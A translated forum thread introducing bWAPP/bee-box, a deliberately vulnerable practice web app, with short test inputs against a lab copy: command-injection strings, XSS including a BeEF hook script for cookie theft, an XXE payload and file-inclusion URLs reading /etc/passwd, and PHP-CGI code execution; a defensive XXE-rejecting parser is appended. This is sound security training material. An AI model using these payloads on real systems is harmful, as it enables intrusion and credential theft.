人=族 posted on 2016-10-14 23:34:08

bWAPP: a very useful learning system for beginners

buggy web Application (bWAPP) is an open-source web application that integrates all kinds of common and recent vulnerabilities. Its purpose is to help security enthusiasts, developers and students discover and prevent web vulnerabilities. It contains more than 100 vulnerabilities, covering all the major known web vulnerabilities, including the OWASP Top 10 security risks, and most importantly it already includes the OpenSSL and Shellshock vulnerabilities.

Download & installation

bWAPP can be downloaded on its own and deployed onto an Apache + PHP + MySQL environment, or you can download its virtual-machine version, bee-box. Many vulnerabilities, such as Shellshock and Heartbleed, are present in bee-box but not in a standalone bWAPP install, so I will mainly use bee-box for this introduction.

Download links:

http://www.mmeit.be/bWAPP/

OR

http://sourceforge.net/projects/bwapp/files/bee-box/

After downloading, unzip the archive and open it with VMware, then browse to port 80. The default bWAPP credentials are:

bee/bug

Officially it claims to have more than 100 built-in vulnerabilities, listed as follows:

* Injection vulnerabilities like SQL, SSI, XML/XPath, JSON, LDAP, HTML, iFrame, OS Command and SMTP injection
* Cross-Site Scripting (XSS), Cross-Site Tracing (XST) and Cross-Site Request Forgery (CSRF)
* Unrestricted file uploads and backdoor files
* Authentication, authorization and session management issues
* Arbitrary file access and directory traversals
* Local and remote file inclusions (LFI/RFI)
* Server Side Request Forgery (SSRF)
* XML External Entity Attacks (XXE)
* Heartbleed vulnerability (OpenSSL)
* Shellshock vulnerability (CGI)
* Drupal SQL injection (Drupageddon)
* Configuration issues: Man-in-the-Middle, cross-domain policy file, information disclosures,...
* HTTP parameter pollution and HTTP response splitting
* Denial-of-Service (DoS) attacks
* HTML5 ClickJacking, Cross-Origin Resource Sharing (CORS) and web storage issues
* Unvalidated redirects and forwards
* Parameter tampering
* PHP-CGI vulnerability
* Insecure cryptographic storage
* AJAX and Web Services issues (JSON/XML/SOAP)
* Cookie and password reset poisoning
* Insecure FTP, SNMP and WebDAV configurations
* and much more...

A quick try-out

Below are the test methods for some of the vulnerabilities:

1. HTML Injection – Reflected (GET)
Input: <a href=http://www.baidu.com>点这里</a>

2. iFrame Injection
Modify the ParamUrl parameter as shown in the screenshot.

3. OS Command Injection
Enter the following strings:
www.nsa.gov;id
www.nsa.gov&&id
www.nsa.gov|id

4. PHP Code Injection
Change the message parameter to PHP code.

5. SQL Injection (GET/Search)
Just run sqlmap against it.

6. XML/XPath Injection (Login Form)
Enter a' or ''=' as the username and password (is this being escaped by the anti-XSS filter here? does it need changing?)

7. Broken Auth. – Password Attacks
Other password tests (SSH, FTP, SNMP)

8. XSS – Reflected (GET)
Input:
<script>alert(/xss/)</script>

9. XSS – Stored (Blog)
Input: <script src=http://192.168.245.136:3000/hook.js></script>
192.168.245.136 is my Kali box, which already has BeEF running.
The browser shows up as hooked in BeEF, and cookies can be grabbed, JS executed, and so on.

10. Insecure WebDAV Configuration
Upload directly with PUT.
Upload successful.

11. HTML5 Web Storage (Secret)
Using Chrome, press F12 to view the username and password.

12. Heartbleed Vulnerability
Log in at https://192.168.245.142:8443/bWAPP/login.php with bee/bug
Dump memory through the vulnerability and directly obtain the credentials that were just used to log in.

13. Remote & Local File Inclusion (RFI/LFI)
Modify the parameter: language=/etc/passwd
To test local inclusion, modify the parameter: language=phpinfo.txt
To test remote inclusion, set the language parameter to the address of a remote shell.

14. XML External Entity Attacks (XXE)
Click "any bugs?", capture the request, and change the POST data to:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///etc//passwd">]><reset><login>&test;</login><secret>login</secret></reset>

15. PHP CGI Remote Code Execution
View the source code: http://192.168.245.142/bWAPP/admin/?-s
Read a file: http://192.168.245.142/bWAPP/admin/?-dauto_prepend_file%3d/etc/passwd+-n
Get a shell with msf: configure the parameters
GETSHELL:

16. Shellshock Vulnerability (CGI)
Capture the request to http://192.168.245.142/bWAPP/shellshock.sh and modify its request headers.

17. Unvalidated Redirects & Forwards
Click beam, capture the request and change the parameter to url=http://www.baidu.com

18. Unrestricted File Upload
Browse and upload a shell.

19. WSDL FILE
Visit: http://192.168.245.142/bWAPP/ws_soap.php?wsdl
Scan the web service with WVS.
Test with sqlmap.

There are other vulnerabilities that I won't test one by one; anyone interested can go and try them.
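As an added, defender-side example (not bWAPP's or the poster's own code): a Python parser for the step-14 reset request that refuses any DOCTYPE or entity declaration, so the quoted XXE payload is rejected before any file is touched. The element names login and secret come from the payload; the function names and the benign sample request are assumptions.

```python
import xml.parsers.expat


class DtdRejected(ValueError):
    """Raised when a request body carries a DOCTYPE or entity declaration."""


def parse_reset_request(xml_data: bytes) -> dict:
    """Parse <reset><login/><secret/></reset> into a dict, refusing any DTD."""
    parser = xml.parsers.expat.ParserCreate()
    fields = {}
    open_elems = []  # element-name stack, so character data lands in the right field

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdRejected(f"DOCTYPE {name!r} is not allowed in this request")
    def reject_entity(name, is_param, value, base, sysid, pubid, notation):
        raise DtdRejected(f"entity {name!r} (system id {sysid!r}) is not allowed")
    def reject_external(context, base, sysid, pubid):
        raise DtdRejected(f"external entity {sysid!r} was not resolved")
    def start(name, attrs):
        open_elems.append(name)
        if name in ("login", "secret"):
            fields.setdefault(name, "")

    def text(data):  # expat may deliver one text node in several chunks
        if open_elems and open_elems[-1] in fields:
            fields[open_elems[-1]] += data

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.ExternalEntityRefHandler = reject_external
    parser.StartElementHandler = start
    parser.CharacterDataHandler = text
    parser.EndElementHandler = lambda name: open_elems.pop()
    parser.Parse(xml_data, True)  # any handler exception propagates out of Parse
    if set(fields) != {"login", "secret"}:
        raise ValueError("request must contain <login> and <secret>")
    return fields


def audit(xml_data: bytes) -> tuple:
    """('ok', fields) for a clean request, ('rejected', reason) for a DTD-bearing one."""
    try:
        return ("ok", parse_reset_request(xml_data))
    except DtdRejected as exc:
        return ("rejected", str(exc))


# Constructed sample inputs: the step-14 payload quoted in the post, and a benign request.
XXE_PAYLOAD = (b'<?xml version="1.0" encoding="UTF-8"?>'
               b'<!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///etc//passwd">]>'
               b'<reset><login>&test;</login><secret>login</secret></reset>')
CLEAN_REQUEST = b'<reset><login>bee</login><secret>login</secret></reset>'
```

Rejecting the DOCTYPE outright is the usual mitigation; the entity and external-reference handlers are kept so the parser still fails closed if the DOCTYPE check is ever removed.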

周翔宇 posted on 2016-10-15 09:18:08

This is a great find for me; off to install it and try it out right away. Thanks to the OP for sharing!

周翔宇 posted on 2016-10-15 10:06:22

Just downloaded it and gave it a try, and read through the introduction and so on. It really is good; it even expands your English vocabulary.

sladjfksld posted on 2016-10-15 11:00:17

Is there a test program that integrates the known vulnerabilities of the various CMSes?